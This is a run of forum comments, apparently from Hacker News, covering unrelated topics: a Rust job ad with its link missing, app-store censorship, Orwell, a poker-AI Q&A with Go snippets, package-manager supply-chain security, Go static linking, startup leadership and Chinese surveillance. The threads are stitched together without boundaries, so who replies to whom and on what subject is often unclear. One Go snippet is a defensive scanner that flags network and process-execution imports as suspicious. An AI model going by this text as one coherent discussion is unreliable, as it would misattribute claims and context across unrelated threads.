Rust Project/Foundation | Program Manager | Remote
Rust is a programming language that helps people build reliable and efficient software at scale. It's a language that many people love.
The members of the Rust Project work together to build and advance this language and its related tooling and infrastructure. We take particular pride in shipping tools that are stable and well polished.
We've lately been doing more explicit program management as part of our ongoing work to improve and scale our processes for shipping our language and these high-quality tools. The systems and standards we've developed have proven to work well within the Rust Project, and we've seen substantial value from this work in the context of our edition and project goal programs.
We're now looking to hire some sharp and talented individuals to support and advance these systems and this work. That's where you come in.
For details on this role, and how to contact us about it, see here:
Here's the thing. Even if you're OK with Apple (or whoever) controlling what you can run on your computers, this is a centralization of power that will be co-opted.
Let's say that Australia wants to ban consumer encryption. This would currently be difficult to enforce for PC software. But on mobile, this is easy. Just make Apple and Google enforce it! Make them ban such apps from their stores. Now you've achieved perfect enforcement on Apple hardware. Even on Android, where people could in theory side-load the banned apps, this would prevent those apps from achieving any scale or network effect.
That's what I think people are missing here. No matter how much you trust Apple, once the mechanisms for this kind of power are in place, you won't be able to control what happens next.
Apple already actively censors political content in apps and actively works with the Chinese government to censor content on the Chinese App Store.
A private company has already put itself in a position to control what software reaches millions of people, without those people having the ability to choose anything else on their pocket computers.
> Apple already actively censors political content in apps...
This is true, which is why I was surprised the other day when I found this app called "BLMovement" while looking around to see if anyone was making a completely distasteful joke...
Lest your comment suggest the author of this article isn't aware of this point, he has made this argument precisely:
> Whereas China needed to control country-wide Internet access to achieve its censorship goals, Apple and Google have helpfully provided the Indian government with a one-stop shop. This also, for better or worse, gives a roadmap for how the U.S. government could respond to TikTok, if it chose to: there is no need to build a great firewall — simply give the order to Apple and Google. Centralization, at least from a central government’s perspective, has its uses.
I don't think the two points you're comparing are similar enough.
If Australia bans encryption, you as a consumer who resides in Australia have a high switching cost (moving, new job, residence, etc.) and thus the consumer loses out.
If Apple starts to use that power badly... you can switch to a number of competitor feature phones with largely the same feature and app capabilities (Android being the most obvious)
In a market with 2+ competitors and low switching costs (moving contacts is quite easy these days, and there aren't a lot of deep 2-year contracts for phones/providers), this point doesn't hold true.
The points are not supposed to be similar... you're missing the part of the parent's argument where one is used as a tool to enforce the other, when otherwise it would be difficult/impossible to enforce.
There is only one real competitor: Android. Google would very much like to have the same degree of control that Apple does over their ecosystem, but they're holding back for now so that they can point to Apple as being worse when the congressional inquiries heat up.
Feature phones are not real competitors to smartphones.
I'd argue there is a third competitor in the form of Huawei/Xiaomi. Despite fears of spying by the Chinese, which might be justified, their phones tend to have better prices all the way up to the ultra-premium market, and because they want to allow you to sideload GmsCore and Play Services, they will never be locked down.
>If Australia bans encryption, you as a consumer who resides in Australia have a high switching cost (moving, new job, residence, etc.) and thus the consumer loses out.
>If Apple starts to use that power badly... you can switch to a number of competitor feature phones with largely the same feature and app capabilities (Android being the most obvious)
It depends: network effects are strong on Apple (iMessage), and maybe you already bought tons of apps and software that you can't transfer to Android or Windows.
"you can switch to a number of competitor feature phones with largely the same feature and app capabilities"
How much does that cost? How does it work if the apps you rely on are iOS only? How do I transfer my app and subscription purchases to my new Android phone?
> But on mobile, this is easy. Just make Apple and Google enforce it!
This is exactly how the Indian government banned TikTok. They are never able to ban websites, because the web is open. But apps they can ban easily, because if Apple/Google say no, they will be squeezed.
As part of selling on Apple's app store, you agree to follow the ToS. The ToS are very clear that you don't set up your own marketplace inside your app where Apple doesn't get a cut. This reaction (terminating Epic's account) was eminently foreseeable and completely justified. You do not fuck with Apple's cut. Don't like it, don't sell on the app store.
Epic thought they were big enough and valuable enough that they could bully their way through ToS violations. All the hip thinkpieces were saying that no matter what happens here Epic comes out on top, because Apple has everything to lose and blah blah.
Turns out nope: Epic's customers do need the app store after all, so Apple has the leverage here.
George Orwell covered this basic point in 1984 (published in 1949):
> The aims of these three groups are entirely irreconcilable. The aim of the High is to remain where they are. The aim of the Middle is to change places with the High. The aim of the Low, when they have an aim -- for it is an abiding characteristic of the Low that they are too much crushed by drudgery to be more than intermittently conscious of anything outside their daily lives -- is to abolish all distinctions and create a society in which all men shall be equal. Thus throughout history a struggle which is the same in its main outlines recurs over and over again. For long periods the High seem to be securely in power, but sooner or later there always comes a moment when they lose either their belief in themselves or their capacity to govern efficiently, or both. They are then overthrown by the Middle, who enlist the Low on their side by pretending to them that they are fighting for liberty and justice. As soon as they have reached their objective, the Middle thrust the Low back into their old position of servitude, and themselves become the High. Presently a new Middle group splits off from one of the other groups, or from both of them, and the struggle begins over again.
It's pretty common in Christian, especially Protestant, theology and culture.
"There is neither Jew nor Gentile, neither slave nor free, nor is there male and female, for you are all one in Christ Jesus. If you belong to Christ, then you are Abraham’s seed, and heirs according to the promise."
And that principle is the often (most?) quoted part of the Declaration of Independence:
"We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the Pursuit of Happiness."
A few years later, the U.S. Constitution banned titles of nobility. We are probably overdue to follow up by nixing professional titles and titles for government officials (Mr. President, Your Honor, etc.).
It's not clear to me that Orwell was saying that. And neither of the passages I cite are talking about laws as such. The Declaration of Independence was certainly extralegal, and perhaps it is more foundational than any given body of law, even.
That's a pretty political bent on things, especially if you are considering the Protestant worldview:
"For it is by grace you have been saved, through faith--and this not from yourselves, it is the gift of God -- not by works, so that no one can boast." (book of Ephesians)
The text (and the theology) clearly divorces the outcome from the work being done. Frankly, a plain reading of the text would be sympathetic to socialism (also see the day of Pentecost, the parable of the workers, etc.). It's very tortured to suggest that this is actually a libertarian "pull yourself up" worldview.
I know, the idea that we'd all be born into more or less equal stations and afforded more or less the same opportunities is a thought too frightening to behold, amiright?
Or tip the balance of power between the three groups.
It seems that in the last 10+ years, social media empires and big tech have done just that: the High turned the Middle and Low against each other.
So the idea behind this is what? That you shouldn't trust the revolutionaries because they don't have your interests in mind? That it's hopeless? This model of the world is just run-of-the-mill status-quoism trying to make people too despondent to tear down hierarchy, not some deep truth.
To be honest I don't know whether Orwell agreed with the position of the High or not, but the fact that people repeat this propaganda of the "high" from 1984 is absurd.
You absolutely shouldn't trust revolutionaries who tell you to die for their causes. Revolutions, and chaos in general, make most people's lives worse off, hence they tend to happen when people's lives are so bad that they can't possibly get worse than the status quo.
That doesn't mean revolutions are bad from a system point of view, they serve as reboots for a system plagued with memory leaks.
Orwell's biography is so famous that we can guess the basics of how he would answer this: revolutionaries don't necessarily have your interests in mind; it's not hopeless; oppose the status quo; don't be blinded by ideology; be honest before being political.
Which biography are you referring to? I’m seeing a few. I didn’t know it was famous and never thought to check, but would definitely like to read now that you mention it.
P.S. it’s always a treat to stumble on a non-moderator comment from dang
Oh, by biography I just meant his life story. I didn't have a specific book in mind.
Orwell is famous for having been early to break with political allies whose tactics he abhorred, even though they were fighting for his side. He had a genius for intellectual honesty, which made his writing exceptionally clear. If there's a clearer writer in English I wonder who it is.
I've read it as: we repeat a cycle where people are always far up on top, and the only way to break that cycle is to be content with more or less everyone being in or near the middle.
Or put another way: so long as there is a High that people can daydream about joining, there will never be equality for the majority of people. Otherwise people will get into the high places, slam the door shut as soon as they can, and the fighting and daydreaming will continue.
I agree with your sentiment, and I am probably on the lower end of the middle class now, coming from a working-class family, but I can't see a way to prevent someone from getting more than me simply by not caring about obeying the rules.
If you have more resources you can buy your exemptions from the law.
Probably from someone who can be "bought" because that money is a significant amount compared to what they usually earn.
I hoped this third Industrial Revolution would free us from labor, but it looks like people don't take it well when you tell them "your job doesn't exist anymore," even if it's generally a good thing.
"The Fourth Industrial Revolution" is one of the most successfully lobbied and marketed instruments of our time. It has preoccupied governments and distracted them from addressing existing inequalities.
Alternatively it can be seen as a lesson for the low to not allow the middle to use them as a weapon. If they want to avoid this same result they'd need to take over their own revolution, not be led by the middle.
By Orwell’s definition you can’t depend on the Low to defend themselves:
> The aim of the Low, when they have an aim -- for it is an abiding characteristic of the Low that they are too much crushed by drudgery to be more than intermittently conscious of anything outside their daily lives
On the large scale, I think Orwell's view is correct. The pattern always repeats itself.
However on the individual level, you can reap the benefits of the revolutions and will die before the next cycle, so there's always at least some incentive to challenge the status quo.
It doesn't change the fact that it's hopeless on the large scale.
Technology has the potential of flattening the social hierarchy somewhat. Or more likely it gives some an out even if they can't get the social status they want -- like making it easier for one to live a life cut off from immediate social circles (and status competition). Anonymous online association is an example that comes to mind.
> That you shouldn't trust the revolutionaries because they don't have your interests in mind? That it's hopeless?
If you've read Orwell's Homage to Catalonia, chronicling his experience in the Spanish Civil War on the side of the socialists, I think that's a reasonable interpretation of his position.
Could you perhaps speak to some of the engineering details that the paper glosses over? E.g.:
- Are the action and information abstraction procedures hand-engineered or learned in some manner?
- How does it decide how many bets to consider in a particular situation?
- Is there anything interesting going on with how the strategy is compressed in memory?
- How do you decide in the first betting round if a bet is far enough off-tree that online search is needed?
- When searching beyond leaf nodes, how did you choose how far to bias the strategies toward calling, raising, and folding?
- After it calculates how it would act with every possible hand, how does it use that to balance its strategy while taking into account the hand it is actually holding?
- In general, how much do these kinds of engineering details and hyperparameters matter to your results and to the efficiency of training? How much time did you spend on this? Roughly how many lines of code are important for making this work?
- Why does this training method work so well on CPUs vs GPUs? Do you think there are any lessons here that might improve training efficiency for 2-player perfect-information systems such as AlphaZero?
We tried to make the paper as accessible as possible. A lot of these questions are covered in the supplementary material (along with pseudocode).
- Are the action and information abstraction procedures hand-engineered or learned in some manner?
- How does it decide how many bets to consider in a particular situation?
The information abstraction is determined by k-means clustering on certain features. There wasn't much thought put into the action abstraction because it turns out the exact sizes you use don't matter that much as long as the bot has enough options to choose from. We basically just did 0.25x pot, 0.5x pot, 1x pot, etc. The number of sizes varied depending on the situation.
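For concreteness, here's a minimal Go sketch of that kind of pot-fraction action abstraction (the fractions and the cap are illustrative assumptions, not the bot's actual configuration):

    // Illustrative pot-fraction action abstraction: candidate bet sizes
    // as fixed fractions of the pot. The fractions and the cap are
    // assumptions for illustration; the real count varied by situation.
    func candidateBetSizes(pot float64, maxBets int) []float64 {
        fractions := []float64{0.25, 0.5, 1, 2}
        sizes := make([]float64, 0, maxBets)
        for _, f := range fractions {
            if len(sizes) == maxBets {
                break
            }
            sizes = append(sizes, f*pot)
        }
        return sizes
    }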
- Is there anything interesting going on with how the strategy is compressed in memory?
Nope.
- How do you decide in the first betting round if a bet is far enough off-tree that online search is needed?
We set a threshold at $100.
- When searching beyond leaf nodes, how did you choose how far to bias the strategies toward calling, raising, and folding?
In each case, we multiplied the biased action's probability by a factor of 5 and renormalized. In theory it doesn't really matter what the factor is.
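In code, that biasing step is just a multiply-and-renormalize. A minimal sketch, using the factor of 5 stated above (the function name is mine):

    // Bias one action's probability by a constant factor, then
    // renormalize so the distribution still sums to 1.
    // factor = 5 per the answer above.
    func biasStrategy(strategy []float64, biased int, factor float64) []float64 {
        out := make([]float64, len(strategy))
        copy(out, strategy)
        out[biased] *= factor
        var sum float64
        for _, p := range out {
            sum += p
        }
        for i := range out {
            out[i] /= sum
        }
        return out
    }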
- After it calculates how it would act with every possible hand, how does it use that to balance its strategy while taking into account the hand it is actually holding?
This comes out naturally from our use of Linear Counterfactual Regret Minimization in the search space. It's covered in more detail in the supplementary material.
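For readers who haven't seen it: Linear CFR is ordinary counterfactual regret minimization with iteration t's regret contribution weighted by t, so early, noisy iterations are discounted. A rough sketch of the two core steps (illustrative names, not the actual codebase):

    // Regret matching: play each action in proportion to its positive
    // cumulative regret; fall back to uniform if none is positive.
    func regretMatch(regret []float64) []float64 {
        strat := make([]float64, len(regret))
        var sum float64
        for _, r := range regret {
            if r > 0 {
                sum += r
            }
        }
        for i, r := range regret {
            if sum > 0 {
                if r > 0 {
                    strat[i] = r / sum
                }
            } else {
                strat[i] = 1 / float64(len(regret))
            }
        }
        return strat
    }

    // Linear CFR: weight iteration t's instantaneous regrets by t, so
    // later iterations count for more than early ones.
    func accumulateLinear(regret, instant []float64, t int) {
        for i := range regret {
            regret[i] += float64(t) * instant[i]
        }
    }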
- In general, how much do these kinds of engineering details and hyperparameters matter to your results and to the efficiency of training? How much time did you spend on this? Roughly how many lines of code are important for making this work?
I think it's all pretty robust to the choice of parameters, but we didn't do extensive testing to confirm. While these bots are quite easy to train, the variance in poker is so high that getting meaningful experimental results is quite computationally expensive.
- Why does this training method work so well on CPUs vs GPUs? Do you think there are any lessons here that might improve training efficiency for 2-player perfect-information systems such as AlphaZero?
I think the key is that the search algorithm is picking up so much of the slack that we don't really need to train an amazing precomputed strategy. If we weren't using search, it would probably be infeasible to generate a strong 6-player poker AI. Search was also critical for previous AI benchmark victories like chess and Go.
The security of package managers is something we're going to have to fix.
Some years ago, in offices, computers were routinely infected or made unusable because the staff were downloading and installing random screen savers from the internet. The IT staff would have to go around and scold people not to do this.
If you've looked at the transitive dependency graphs of modern packages, it's hard to not feel we're doing the same thing.
In the linked piece, Russ Cox notes that the cost of adding a bad dependency is the sum of the cost of each possible bad outcome times its probability. But then he speculates that for personal projects that cost may be near zero. That's unlikely. Unless developers entirely sandbox projects with untrusted dependencies from their personal data, company data, email, credentials, SSH/PGP keys, cryptocurrency wallets, etc., the cost of a bad outcome is still enormous. Even multiplied by a small probability, it has to be considered.
As dependency graphs get deeper, this probability, however small, only increases.
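To spell out the arithmetic in Cox's framing (the struct and the numbers in the comments are mine, purely for illustration):

    // Expected cost of a dependency: the sum over bad outcomes of
    // probability x cost. Values below are purely illustrative.
    type outcome struct {
        probability float64 // chance per year
        cost        float64 // in dollars
    }

    func expectedCost(outcomes []outcome) float64 {
        var total float64
        for _, o := range outcomes {
            total += o.probability * o.cost
        }
        return total
    }

    // Even at a 0.1% yearly chance, leaked credentials with a $100,000
    // cleanup cost contribute $100/year, which is far from "near zero".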
One effect of lower-cost dependencies that Russ Cox did not mention is the increasing tendency for a project's transitive dependencies to contain two or more libraries that do the same thing. When dependencies were more expensive and consequently larger, there was more pressure for an ecosystem to settle on one package for a task. Now there might be a dozen popular packages for fancy error handling and your direct and transitive dependencies might have picked any set of them. This further multiplies the task of reviewing all of the code important to your program.
Linux distributions had to deal with this problem of trust long ago. It's instructive to see how much more careful they were about it. Becoming a Debian Developer involves a lengthy process of showing commitment to their values and requires meeting another member in person to show identification to be added to their cryptographic web of trust. Of course, the distributions are at the end of the day distributing software written by others, and this explosion of dependencies makes it increasingly difficult for package maintainers to provide effective review. And of course, the hassles of getting a library accepted into distributions is one reason for the popularity of tools such as Cargo, NPM, CPAN, etc.
It seems that package managers, like web browsers before them, are going to have to provide some form of sandboxing. The problem is the same. We're downloading heaps of untrusted code from the internet.
After using Go and Dart on a number of projects with very few dependencies (compared to JavaScript projects), I'd say a good starting point is having a great standard library.
For example, it's a bit ridiculous that in 2019 we cannot decode a JWT using a simple browser API, we still need Moment for time and date operations, there is no observable type (a four-year-old proposal is still in the draft stage), and there is still no native data-binding.
The TC39 is moving too slowly and that's one of the reasons why NPM is so popular.
I mean, even all of those examples you listed aren't as crazy as the fact that you need a library to parse the cookie string and deal with individual cookies...
> Becoming a Debian Developer involves a lengthy process of showing commitment to their values and requires meeting another member in person to show identification to be added to their cryptographic web of trust
At the very least. More often people receive mentoring for months and meet in person.
> this explosion of dependencies makes it increasingly difficult for package maintainers to provide effective review
It makes packaging extremely time-consuming, and that's why a lot of things in Go and JavaScript are not packaged.
The project cares about security and compliance with licensing.
> ... the increasing tendency for a project's transitive dependencies to contain two or more libraries that do the same thing. When dependencies were more expensive and consequently larger, there was more pressure for an ecosystem to settle on one package for a task. Now there might be a dozen popular packages for fancy error handling and your direct and transitive dependencies might have picked any set of them.
It's not just a security problem. It also hampers composition, because when two libraries talk about the same concept in different "terms"/objects/APIs (because they rely on two different other libraries to wrap it), you have to write a bridge to make them talk to each other.
That's why large standard libraries are beneficial - they define the common vocabulary that third-party libraries can then use in their API surface to allow them to interoperate smoothly.
> The security of package managers is something we're going to have to fix.
why the generalization? lots of package managers have been serviceable for decades, their security model based solely on verifying the maintainer's identity, with clients deciding which maintainers to trust.
this is of course an issue with all package managers, but it's the lack of trusted namespacing that makes it easy to fall into. (there are scopes, which sound similar, but the protection model of the scope name is currently unclear to me, and they're optional anyway)
compare to maven, where a package prefix gets registered along with a cryptographic key and only the key holder can upload to it in the central repo.
sure you get malicious packages going around, but it's far easier not to fall for them because it's significantly harder to get a user to download a random package outside the namespaces they know
> We're downloading heaps of untrusted code from the internet.
this is not something a package manager can fix, it's a culture problem. even including a gist or something off codepen is dangerous. a package manager cannot handle the 'downloading whatever' issue; it's not reasonable to put that in its threat model, because no package manager maintainer can possibly guarantee that there is no malicious code in its repository, and it's not its role anyway. a package manager is there to get a package to you as it was published at a specific point in time, identified by its version, and its threat model should be people trying to publish packages under someone else's name.
speaking of which, it took npm 4 years to prevent people from publishing a package with new code under an existing version number: https://github.com/npm/npm-registry-couchapp/issues/148 - they eventually came to their senses, but heck, the whole node.js ecosystem's gung-ho attitude is scary.
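for what it's worth, the client side of "a package as it was published at a specific point in time" can be enforced by pinning a content hash in a lockfile and verifying on download, roughly like this (a sketch only; real systems use stronger formats, e.g. npm's sha512 integrity fields or Go's go.sum):

    package lockfile

    import (
        "crypto/sha256"
        "encoding/hex"
        "fmt"
    )

    // Verify downloaded package bytes against a hash pinned in a
    // lockfile. Sketch only: real package managers use richer formats
    // (npm's sha512 integrity fields, Go's go.sum hashes).
    func Verify(pkg []byte, pinnedHex string) error {
        sum := sha256.Sum256(pkg)
        if hex.EncodeToString(sum[:]) != pinnedHex {
            return fmt.Errorf("package bytes do not match the pinned hash")
        }
        return nil
    }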
> why the generalization? lots of package managers have been serviceable for decades, their security model based solely on verifying the maintainer's identity, with clients deciding which maintainers to trust.
What happens when the maintainer of a package changes?
The big problem I see happening is maintainers getting burned out and abandoning their packages, and someone else taking over. You might trust the original maintainer, but do you get notified of every change in maintainer?
> The security of package managers is something we're going to have to fix.
Companies that care about this already have dependency policies in place. The companies that don't care so much about security already have an approach to security problems that they will employ if a significant threat is revealed: spend time and money to fix it then.
It's a herd approach. Sheep and cattle band together because there's strength in numbers and the wolves can only get one or two at a time. It's extremely effective at safeguarding most of the flock.
>Companies that care about this already have dependency policies in place. The companies that don't care so much about security already have an approach to security problems that they will employ if a significant threat is revealed: spend time and money to fix it then.
I think that probably the majority of companies actually fall into a third group: Those who don't really care enough about this but also don't really have a good policy for dealing with it.
> It's instructive to see how much more careful they were about it.
"Much more careful" would have been a requirement to consult upstream on all patches that are beyond the maintainer's level of expertise. Especially so for all patches that potentially affect the functioning of cryptographic libraries.
Debian has had a catastrophe to show the need for such a guideline. Do they currently have such a guideline?
If not, it's difficult to see the key parties as anything more than security theatre.
> The security of package managers is something we're going to have to fix.
Inclusiveness, and the need for Jeff Freshman and Jane Sophomore to have a list of 126 GitHub repos before beginning their application process for an intern job, are at odds with having vetted entities as package providers.
When I was developing Eclipse RCP products, I had three or five entities that provided signed packages I used as dependencies.
Plus: with npm, you even have tooling dependencies, so the former theoretical threat of a malicious compiler injecting malware is now the sad reality[0].
I'm not claiming the "old way" is secure, but the "new way" is insecure by design and by policy (inclusiveness, gatekeeping as fireable offense).
[0] I have tooling dependencies in Gradle and Maven too, but again, these are from large vendors and not from some random resume-padding GitHub user.
I'm a big fan of kitchen-sink frameworks for this reason. Whenever I want to do something in JS, the answer is to install a package for it. When I want to do something in Rails, the answer is that it's built in. I have installed far, far fewer packages for my back end than for the frontend, and the back end is vastly more complex.
TLDR: it boils down to analysing dependencies at the level of the callgraph; but building those callgraphs isn't easy. The benefit in the security use case is ~3x increased accuracy when identifying vulnerable packages (by eliminating false positives).
This right here is why Go's 'statically link everything' is going to become a big problem in the long run when old servers are running that software and no one has the source code anymore.
i don't see how that's true. in both worlds, a developer has to take manual action to review published vulnerabilities, track down repos they own that are affected, and upgrade the dependencies.
No: with dynamic linking, and especially with Linux distributions, most of the work is automated and the patching is done by the distribution security team.
The time to write a patch and deliver it to running systems goes down to days or, more often, hours.
Cautiously posting that link, because I'm not against vendoring. You just need a process around keeping your dependencies up to date / refreshed automatically. The ability to vendor is one thing, how you use it is another.
It would be nice if our compilers had the ability to directly incorporate the source code into the binary in some standard way. E.g. on Win32, it could be a resource, readily extractable with the usual resource viewer. On Unix, maybe just a string constant with a magic header, easy to extract via `strings`. And so on.
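As one partial illustration of the idea, Go's embed package (Go 1.16+) can bundle a package's own sources into the binary, though it doesn't capture the whole dependency tree. A sketch:

    package main

    import (
        "embed"
        "fmt"
        "io/fs"
    )

    // Embed this package's .go files into the binary itself, so the
    // source ships inside the executable. This covers only the package
    // directory, not the full dependency tree.
    //go:embed *.go
    var sources embed.FS

    func main() {
        fs.WalkDir(sources, ".", func(path string, d fs.DirEntry, err error) error {
            if err != nil || d.IsDir() {
                return err
            }
            data, err := sources.ReadFile(path)
            if err != nil {
                return err
            }
            fmt.Printf("%s: %d bytes of embedded source\n", path, len(data))
            return nil
        })
    }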
I agree this would be positive. But the source only gets you halfway there: you still need to be able to reproduce a compatible build system. And the longer ago the software was originally developed, the more challenging that becomes.
There are lots of old projects out there relying on some ancient VS2003 installation. The same will happen with modern languages in a decade: code goes stale, and it gets more and more difficult to pull down the versions of software it was originally built with.
I hate (read: love) to be pedantic, but all scripting languages already have this feature built-in, and thanks to modern VMs and JIT compilers and the like, performance is much less of an issue.
It would be interesting to see e.g. a Go executable format that ships with the source, build tools and documentation that would compile to the current platform on demand. Should be doable in a Docker image at least.
No one's going to waste resources putting source code on the server, dude; they'll host it somewhere else, and then something will happen to it, or they just won't see the need to give the source to anyone because they're the only people in the company who understand it anyway, etc.
Given the ease with which the parser and AST are made available to developers, we should be able to implement tools which can detect naughty packages. Also, given the speed at which projects can be compiled, the impetus to keep the source code should remain strong.
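In Go, for instance, a crude version of such a screen is only a few lines with go/parser (a sketch; the "suspicious" list is hypothetical, and checking imports alone is easily evaded, as the replies note):

    package scan

    import (
        "fmt"
        "go/parser"
        "go/token"
    )

    // Crude illustration of AST-based screening: flag files importing
    // packages that a given kind of library has no business touching.
    // Hypothetical list; a real scanner needs far more than this.
    var suspicious = map[string]bool{
        `"os/exec"`:  true,
        `"net"`:      true,
        `"net/http"`: true,
    }

    func flagImports(filename string) error {
        fset := token.NewFileSet()
        f, err := parser.ParseFile(fset, filename, nil, parser.ImportsOnly)
        if err != nil {
            return err
        }
        for _, imp := range f.Imports {
            if suspicious[imp.Path.Value] {
                fmt.Printf("%s imports %s\n", filename, imp.Path.Value)
            }
        }
        return nil
    }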
> we should be able to implement tools which can detect naughty packages
We can! It's one thing to know that there's no major technical obstacle to having a security-oriented static analysis suite for your language of choice. It's quite another for one to actually have already been written.
The primary wrinkle tends to be around justifying the cost of building one. For companies that use small languages, that means a non-trivial cost in engineer time just to get a research-grade scanner. For companies whose products are security scanners, it means waiting until there's a commercial market for supporting a language.
This is a problem I've been struggling with. I sympathize a great deal with developers who want to use the newest, most interesting, and above all most productive tools available to them. This stacks up awkwardly against the relatively immature tooling ecosystem common in more cutting-edge languages with smaller communities and less corporate support.
Granted. But it will at least raise the bar for building an exploit package from "knows how to code" to "knows how to code, knows something about exploits, and knows how to avoid detection by an automated scanner."
It really depends on how the developers work; if they know the software will have to run for 10+ years, mostly unmaintained / unmonitored, they can opt to vendor all the dependencies so that a future developer can dive into the source of said dependencies.
Also, the Go community tends to frown on adding superfluous dependencies - this is a statement I got while looking for web API frameworks. Said frameworks are often very compact as well, a thin wrapper around Go's own APIs.
I've also worked on a project which had to be future-proofed solidly; all documentation for all dependencies had to be included with the source code.
The basic problem is that what he was doing for the first 12 months was right. Doing what a big company executive would have done would have been wrong.
When the new CEO comes in and wants things done immediately in the big company way, it's going to feel like the new guy is saying he was doing everything wrong. Further, the actions he was taking will be perceived by others in the company and by new management as his identity rather than as a rational response to the circumstances of the early company.
A smart and observant person in such a role might come around over time naturally. He or she would notice that what worked early on isn't working as well any longer and would adapt. That may even be better for the company than going overnight from "small company mode" to "big company mode".
Or the person may not come around. Either way, it's likely change will not be perceived as fast enough. Difficult problem for all parties.
>He or she would notice that what worked early on isn't working as well any longer and would adapt.
I've seen a few execs not be able to do this, so I don't really blame the CEO in this situation. They did fine and dandy as the product started out but were flailing in the wind once we got big enough.
I saw more companies collapse at that stage because they decided they were now a new kind of company that needed to scale than I saw collapse because they did not scale fast enough.
In the West we have a false sense of security that totalitarianism will inevitably fail. We've seen so many examples of fallen tyrannical states. But many ideas fail the first few times they're tried. China seems committed to making totalitarianism "work."
It's hard to think of any more dangerous invention. Even nuclear weapons aren't as dangerous as a sustainable model for modern tyrannical government.
This is an invention that would be exported and widely adopted.
The liberal democratic model of government spread around the world not just because the people saw it work in America and decided that's what they wanted, but also because the ruling aristocrats saw that it would be net better for them. The French Revolution probably helped convince them it compared favorably to the guillotine.
If another model is pioneered and proven that's better for the ruling class, it won't be difficult to find regimes eager to adopt it.
I very much doubt it is sustainable. The cost of policing is quite substantial and the productivity lost is hard to replace which adds to the cost.
What we are seeing today is essentially a low intensity conflict[0], not unlike what took place in white Rhodesia/Namibia, Northern Ireland during the Troubles, etc. There is an economic reason why these conflicts could not last indefinitely, no matter what ideologies drive them.
Technology is making the price of policing a large population plummet. Natural language recognition, face recognition, location tracking, pattern matching, deep packet inspection, graph traversal, and of course AI can all run unattended, pointing out dissidents to the authorities, who just have to go round them up and reeducate them. Oh, and guess what China is making a big investment in lately?
TBH, AI worries me because it removes much of the human cooperation required to keep such regimes in place; however, it is probably still a few decades away.
The false-positive/negative rates are the key here. If they are not too bad, then yeah, it may 'work' in the short term. If they are sky high, like most facial recognition is today, then it's not going to work. Word will leak out very quickly that the surveillance is worthless.
For an authoritarian police state, false positives are fine as a show of force.
If the system mistakes you for someone else, you might get your door kicked down, your dog shot, and get dragged in and interrogated. Then you will come to realize what will happen if you really run afoul of them. So maybe you think twice if you're planning an infraction in the future.
So they may well want to round up the top N suspects, knowing that N-1 are innocent.
Yes, but this is a separate issue from surveillance. You can have surveillance under totalitarianism just as well as under democracy (not that it's ever typical, though).
Ancient Egypt seems to be the exception in history. Such reliable agriculture and continued population concentration around the Nile are very peculiar situations that have no parallels elsewhere.
If Egypt was truly superior, it really should not have been so easily conquered by Ptolemy and then Rome, both of which had much less authoritarian societies.
> I very much doubt it is sustainable. The cost of policing is quite substantial and the productivity lost is hard to replace which adds to the cost.
Why do you think the Chinese government can't sustain the cost? Intensive policing is manpower intensive, and China presently has manpower to spare. They also don't have to deal with democratic pressures to contain the cost and redirect the savings to programs that benefit the general public.
In my view, they are not sustaining the cost. We are, by buying their products. If totalitarianism becomes universal, that's when it ceases to be sustainable.
The ruling class has luxuries that they could not have developed for themselves without them being broadly available. I'm thinking of things like cell phones, the Internet, and possibly the money system.
I love that we're talking about how bad totalitarianism is while we literally have the upper class exporting jobs to China for a quick buck and a president who campaigned on bringing them back who just betrayed his base (and his country) by helping a Chinese company keep their jobs... Living in the free-est country in the world apparently means you're free to sell out your fellow man to the totalitarian state overseas.
I think _that_ is the sustainability problem we need to talk about. We're feeding them and starving ourselves.
That's correct. Due to the one-child policy and other causes, China is already suffering a worker shortage, and the demographers say it will get much worse in the future.
Your argument does not preclude selective policing; if, for example, policing of Han ethnicities remains sufficiently light, this can persist indefinitely. Slavery, as well as oppression of minorities, used to be seen as part and parcel of human society; one should not doubt so easily that oppressive regimes can be sustainable.
Northern Ireland (in the 1900s) was less about resistance to a tyrannical state, and much more about a population split 50/50ish who had hated each other for a few hundred years. British action there was far from exemplary, but had the people of Northern Ireland woken up one day to find they were part of the Republic of Ireland, precisely no problems would have been solved.
China has a social credit system that is locked in with this totalitarian system. Based on how irrational humans are, I fully expect a huge spike in suicides. Once people get into so much social debt that others stop associating with them and they are locked out of work and simple things such as garbage collection, they will start to end their lives.
I want to be wrong about suicide and right about social credit systems though....
What if you're wrong? You have doubts, where's the evidence?
> What we are seeing today is essentially a low intensity conflict
This part I don't see at all. Who are the sides in this low intensity conflict? The examples in Wikipedia are distinct identities or states. What identities are in contention in China?
>What if you're wrong? You have doubts, where's the evidence?
I am not in the clairvoyant business. Expressing doubt is as much as I could do.
>This part I don't see at all. Who are the sides in this low intensity conflict?
Armed insurrection has been ongoing since the early 90s[0], loosely organised by ETIM[1] as well as various affiliated Islamist groups in neighboring countries, especially of late. They are backed by sympathetic donors in the Gulf states, Turkey, and (allegedly) the CIA. Since then there have been several high-profile riots and terrorist attacks both in[2] and out[3] of Xinjiang.
Obviously they are fighting against the police and the army loyal to the government. In addition there are local entities known as Bingtuan[4] that are best described as a military-industrial complex with several company towns at strategic locations throughout the region. They are under the direct command of the state department and are expected to counter the provincial leadership should they become insubordinate.
There are also smaller groups of Hui (Chinese Muslims) seeking to consolidate their identity and Kazakh irredentists seeking reunification with Kazakhstan, but they are much less significant and tend to be allied with the government against the Uighur.
> What if you're wrong? You have doubts, where's the evidence?
There's not enough data to make predictions like that. But one very good reason for optimism is that China's current totalitarian stability is an unstable false vacuum. It's sustained by the outrageously rapid economic growth seen in the decades since the cultural revolution.
Basically: if you're Chinese, your grandparents (if they were lucky) survived a devastating world war and invasion by Japan, an even more devastating civil war, and a still more devastating famine forced on them by the nutjobs who won the civil war.
And now their grandkids are all running around with smartphones in their pockets, collecting college diplomas and international graduate degrees, vacationing in Thailand and Hawaii, and generally dancing on the world stage like the Americans do.
That kind of success pays for a lot of totalitarian angst. But it won't forever. These folks' kids aren't going to be happy with only 2% GDP growth as payment for their political dominance by a corrupt elite. The proletariat never has been.
The Chinese proletariat isn't running around the world collecting foreign graduate degrees; they are working in factories in Shenzhen to feed their children back in the village. But you're right in that it's typically privileged young people who are behind liberal revolutions.
I think if the state enlists and coopts a sufficient percentage of the local population, then it can work indefinitely, if the gov't provides enough in terms of basic needs. The idea of local administrative committees and youth organizations as an arm to make others toe the line is not a foreign concept to the CCP.
